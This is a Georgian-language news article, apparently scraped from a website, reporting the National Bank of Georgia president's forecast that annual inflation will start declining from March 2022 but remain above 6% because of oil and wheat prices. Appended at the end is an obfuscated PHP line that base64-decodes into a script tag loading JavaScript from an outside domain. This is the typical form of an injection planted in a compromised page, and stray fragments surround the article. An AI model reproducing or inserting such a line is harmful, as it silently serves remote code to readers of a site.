celsiusi
ავერსი საქკაბელი
საქართველოს ეროვნული ბანკის პრეზიდენტის განცხადებით, 2022 წლის მარტში წლიური ინფლაცია 6%-ზე მაღალი იქნება - ამის შესახებ კობა გვენეტაძემ ჟურნალისტების იმ კითხვის საპასუხოდ განაცხადა, რომელიც ქვეყანაში ინფლაციურ მოლოდინებს შეეხებოდა.
 
სებ-ის პრეზიდენტი არ აკონკრეტებს, როგორია მარეგულირებლის პროგნოზი და განმარტავს, რომ ეროვნული ბანკის პროგნოზის მიხედვით, 2022 წლის მარტიდან წლიური ინფლაცია შემცირებას დაიწყებს, თუმცა ნავარაუდებ 6%-ზე მეტი იქნება. ამის მიზეზად კი კობა გვენეტაძე საერთაშორისო ბაზარზე ნავთობისა და ხორბლის ფასების ზრდას ასახელებს.
 
„ინფლაცია მხოლოდ საქართველოს პრობლემა არ არის, ეს მთლიანად გლობალური პრობლემაა და პანდემიამ გამოიწვია ის წინაპირობები, რომლის გამოც გლობალურად ინფლაცია პრობლემაა.
 
უშუალო მიზეზებს რაც შეეხება, ეს არის გაძვირებული საერთაშორისო ფასები ანუ ის ფაქტორები, რომლებიც მიწოდების მხრიდან მოქმედებს ინფლაციაზე. მაგალითად, ნავთობი, რომელიც ახლა, დაახლოებით, 2.5-ჯერ მეტი ღირს ვიდრე ერთი წლის წინ, ასევე თუ FAO-ს ინდექსს გადავხედავთ, საკვები პროდუქტების ფასები საკმაოდ გაზრდილია. თავიდან იყო კურსის გაუფასურების ფაქტორი, რომელმაც ამაში თავისი როლი ითამაშა. საქმე ის არის, რომ როდესაც პროგნოზს ვაკეთებთ, ვითვალისწინებთ იმას რამდენი ხანია, რაც ეს პროცესი დაიწყო. თუ შევხედავთ, მაგალითად, ნავთობის ფასების ზრდას, უნდა ვიცოდეთ, რომ ეს მუდმივად არ მოხდება და რაღაც დონეზე ეს გაჩერდება. საქართველოს შემთხვევაში იყო კომუნალური სფეროს სუბსიდირების საკითხი, რამაც შეამცირა ინფლაცია, შემდეგ კი კიდევ უფრო დაუმატა ინფლაციას, მეთოდოლოგიის გამო.
 
ვფიქრობთ, ეს ფაქტორები მიილევა, რადგან ინფლაციას ჩვენ თვის ჭრილში ვუყურებთ, მაგრამ წლიურ ჭრილში და 12 თვის შემდეგ უნდა შევამჩნიოთ სხვაობა. აქედან გამომდინარე, მიგვაჩნია, რომ მარტიდან წლიური ინფლაცია შემცირებას დაიწყებს. ის ალბათ უფრო მაღალი იქნება, ვიდრე ადრე ვვარაუდობდით. ჩვენი პროგნოზი იყო, რომ მარტში წლიური ინფლაცია 6%-მდე შემცირდებოდა, თუმცა იქიდან გამომდინარე ,რომ ნავთობის ფასებმა გააგრძელეს ზრდა და ამავე დროს ხორბლის ფასებიც იზრდება, შემცირება არ იქნება ისეთი, როგორსაც ვვარაუდობდით“, - განმარტა სებ-ის პრეზიდენტმა.
 
კითხვას - რამდენ პროცენტამდე შემცირდება ინფლაცია მარტისთვის, კობა გვენეტაძემ ასე უპასუხა: „მე იმ გადმოსახედიდან ვსაუბრობ, როდესაც ეს პროგნოზები გაკეთდა. იქიდან გამომდინარე, რომ სხვა ფაქტორი ამ შემთხვევაში არ არის და ეროვნული ვალუტის გაცვლითი კურსი საკმაოდ დიდი ხანია შედარებით სტაბილურია და სხვა ფაქტორებიც არსებობს, ვფიქრობთ, ინფლაცია უფრო მაღალი იქნება; როდესაც განახლდება პროგნოზები, ამას მერე მოგახსენებთ“.
 
მისივე თქმით, მარეგულირებელი ინფლაციური პროცესების სამართავად ყველა შესაძლო მექანიზმს იყენებს, რაც პირველ რიგში, მონეტარული პოლიტიკის გამკაცრებაში გამოიხატება.
 
„პროგნოზებში ჩვენ ვითვალისწინებთ ყველა ახალ გარემოებას, რომელიც გვაქვს, მაგრამ იმისთვის, რომ მიზნობრივ მაჩვენებელზე უფრო მაღალი ინფლაცია მოლოდინებში არ გადაიზარდოს, საკმაოდ გამკაცრებული მონეტარული პოლიტიკა გვაქვს და ეს უნდა დაეხმაროს ამ პროცესს. იმ შემთხვევაში თუ ვნახეთ, რომ საჭიროა სხვადასხვა ზომა, ამ ზომების მიღებას გავაგრძელებთ, პირველ რიგში, ეს მონეტარული პოლიტიკის განაკვეთის გამკაცრებაა, მაგრამ ისევ და ისევ უნდა დავინახოთ როგორ ცვლის ეს მდგომარეობას ბაზარზე“, - აღნიშნა გვენეტაძემ.
 
სებ-ის ოქტომბრის მონეტარული პოლიტიკის ანგარიშის მიხედვით კი, ინფლაციამ ბოლო პერიოდში მიზნობრივ მაჩვენებელს მნიშვნელოვნად გადააჭარბა და მოკლევადიან პერიოდში მაღალ ნიშნულზე შენარჩუნდება. მასზე მოქმედი, დიდწილად ერთჯერადი, ფაქტორების ამოწურვისა და მკაცრი მონეტარული პოლიტიკის რეაგირების შედეგად, მიზნობრივ მაჩვენებელთან დაახლოება 2022 წლის მე-2 კვარტალიდან დაიწყება.
1247
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");